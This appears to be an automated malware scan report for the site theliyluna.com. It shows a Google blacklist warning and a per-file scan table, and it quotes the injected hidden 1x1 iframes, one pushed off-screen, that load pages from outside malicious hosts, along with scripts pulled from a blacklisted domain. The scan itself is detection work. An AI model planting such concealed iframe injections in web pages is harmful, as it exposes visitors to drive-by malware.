Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theliyluna.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.theliyluna.com/ | 200 OK Content-Length: 4997 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://forrotemperonordestino.com.br//images/stories/pin.php <iframe src="http://forrotemperonordestino.com.br//images/stories/pin.php" width="1" height="1"> | ||
http://www.theliyluna.com/index.php | 200 OK Content-Length: 20699 Content-Type: text/html | malicious |
Page code contains blacklisted domain: theliylunasw.susaludocupacional.com ...[24191 bytes skipped]... })(document,'script') </script> <!-- End of Zopim Live Chat Script --> <div class="clear"></div> </div> </div> </div> <div class="clear"></div> </div> </div> </div> </div> <link type="text/css" rel="stylesheet" media="all" href="http://theliylunasw.susaludocupacional.com/cometchat/cometchatcss.php" /><script type="text/javascript" src="http://theliylunasw.susaludocupacional.com/cometchat/cometchatjs.php"></script> </body> </html> <div id="contentframe" style="position:relative; left: -2000px;"><iframe src="http://frky7.name:8590/public/education/serial.php?press=46" width="1" height="1"></iframe></div> Malicious iFrame found. size: 1x1 src: http://frky7.name:8590/public/education/serial.php?press=46 This URL is marked by Google as suspicious <iframe src="http://frky7.name:8590/public/education/serial.php?press=46" width="1" height="1"> | ||
http://www.theliyluna.com/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://www.theliyluna.com/components/com_k2/js/k2.js | 200 OK Content-Length: 3077 Content-Type: application/javascript | clean |
http://www.theliyluna.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://www.theliyluna.com/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 21474 Content-Type: application/javascript | clean |
http://www.theliyluna.com/plugins/system/rokbox/themes/clean/rokbox-config.js | 200 OK Content-Length: 2598 Content-Type: application/javascript | clean |
http://www.theliyluna.com/components/com_gantry/js/gantry-buildspans.js | 200 OK Content-Length: 723 Content-Type: application/javascript | clean |
http://www.theliyluna.com/components/com_gantry/js/gantry-inputs.js | 200 OK Content-Length: 2963 Content-Type: application/javascript | clean |
http://www.theliyluna.com/components/com_gantry/js/gantry-smartload.js | 200 OK Content-Length: 2253 Content-Type: application/javascript | clean |
http://www.theliyluna.com/templates/rt_nebulae_j15/js/gantry-module-scroller.js | 200 OK Content-Length: 2714 Content-Type: application/javascript | clean |
http://www.theliyluna.com/modules/mod_roknavmenu/themes/fusion/js/fusion.js | 200 OK Content-Length: 13893 Content-Type: application/javascript | clean |
http://www.theliyluna.com/modules/mod_roktabs/tmpl/roktabs.js | 200 OK Content-Length: 12126 Content-Type: application/javascript | clean |
http://www.theliyluna.com/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 8843 Content-Type: application/javascript | clean |
http://www.theliyluna.com/modules/mod_accordion_gallery/js/swfobject.js | 200 OK Content-Length: 9759 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theliyluna.com
Result:
GET / HTTP/1.1
Host: theliyluna.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: theliyluna.com
Referer: http://www.google.com/search?q=theliyluna.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theliyluna.com
Referer: http://www.google.com/search?q=theliyluna.com
Result:
The result is similar to the first query. There are no suspicious redirects found.